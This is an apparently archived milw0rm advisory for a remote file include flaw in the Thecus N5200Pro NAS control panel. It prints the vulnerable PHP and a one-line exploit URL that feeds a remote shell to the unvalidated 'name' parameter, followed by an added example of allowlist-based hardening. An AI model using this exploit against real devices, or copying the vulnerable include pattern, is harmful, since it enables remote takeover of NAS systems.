
Thecus N5200Pro NAS Server Control Panel RFI Vulnerability


Thecus N5200Pro NAS Server Control Panel Remote File Include


Author : Crackers_Child

Mail    : cashr00t@hotmail.com

Bug in : usrgetform.html


<?php
    // User-controlled value taken straight from the request.
    $htm=$_REQUEST['name'];
    require_once("/img/htdocs/webconfig");
    require_once("/img/www/inc/function.php");
    get_sysconf();
    $version=trim(shell_exec("/bin/cat /img/version"));
    $model=trim(shell_exec('/bin/cat /proc/thecus_io | awk -F: \'/CPUFLAG/{printf("%s", $2)}\''));
    if($model=="1"){
      $model_name=$webconfig['product_no'].$webconfig['pro'];
    }else{
      $model_name=$webconfig['product_no'];
    }
    if (!$htm){
        print 'no name given';
        exit;
    }
    if ($htm=='lang') $htm='../pub/lang';
    session_start();
    header('Content-type: text/html;charset=utf-8');
    $lang='en';
    if (isset($_SESSION['lang'])){$lang=$_SESSION['lang'];};
    ob_start();
    // The request value reaches include() with no validation.
    include("$htm.htm");
    $html=ob_get_contents();
    ob_end_clean();

     include_once('header.html');
?>



Exploit : www.site.com:9443/usr/usrgetform.html?name=Shelz?

Info : http://www.thecus.com/products_over.php?cid=11&pid=8

Greetz: Str0ke

# milw0rm.com [2008-02-18]
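
A hardened form of the include("$htm.htm") call in the listing above, added here as an example; it is not code from the advisory or from Thecus. The function name resolve_template, the allowlist entries and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example: the names, paths and allowlist below are assumptions, not firmware values.

/** Map the request's `name` value to a template file, or null if it is not permitted. */
function resolve_template(string $name, string $webRoot, array $allowed): ?string
{
    // Exact-match allowlist: the request value only selects a key and is
    // never concatenated into the path handed to include.
    if (!isset($allowed[$name])) {
        return null;
    }
    $base = realpath($webRoot);
    $path = realpath($webRoot . '/' . $allowed[$name]);
    // Containment check: the resolved file must exist and sit under the web root,
    // so a bad allowlist entry or a symlink cannot point outside it.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo tree standing in for the device's web root.
$root = sys_get_temp_dir() . '/tpl_demo_' . getmypid();
@mkdir("$root/usr", 0700, true);
@mkdir("$root/pub", 0700, true);
file_put_contents("$root/usr/login.htm", "<p>login form</p>\n");
file_put_contents("$root/pub/lang.htm", "<p>language picker</p>\n");

$allowed = ['login' => 'usr/login.htm', 'lang' => 'pub/lang.htm'];

// Constructed inputs: two valid names, a traversal, a URL-style value, an unknown name.
$inputs = ['login', 'lang', '../../etc/passwd', 'http://example.invalid/x?', 'nosuch'];
foreach ($inputs as $name) {
    $path = resolve_template($name, $root, $allowed);
    if ($path === null) {
        printf("%-28s rejected\n", $name);
        continue;
    }
    ob_start();
    include $path;               // only allowlisted, contained files reach include
    $html = ob_get_clean();
    printf("%-28s served %d bytes\n", $name, strlen($html));
}
```

Run with the PHP CLI (7.1 or later for the nullable return type); only the two allowlisted names are served and every other value is rejected before any include happens.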




Crackers_Child                                                                                              02/18/2008

								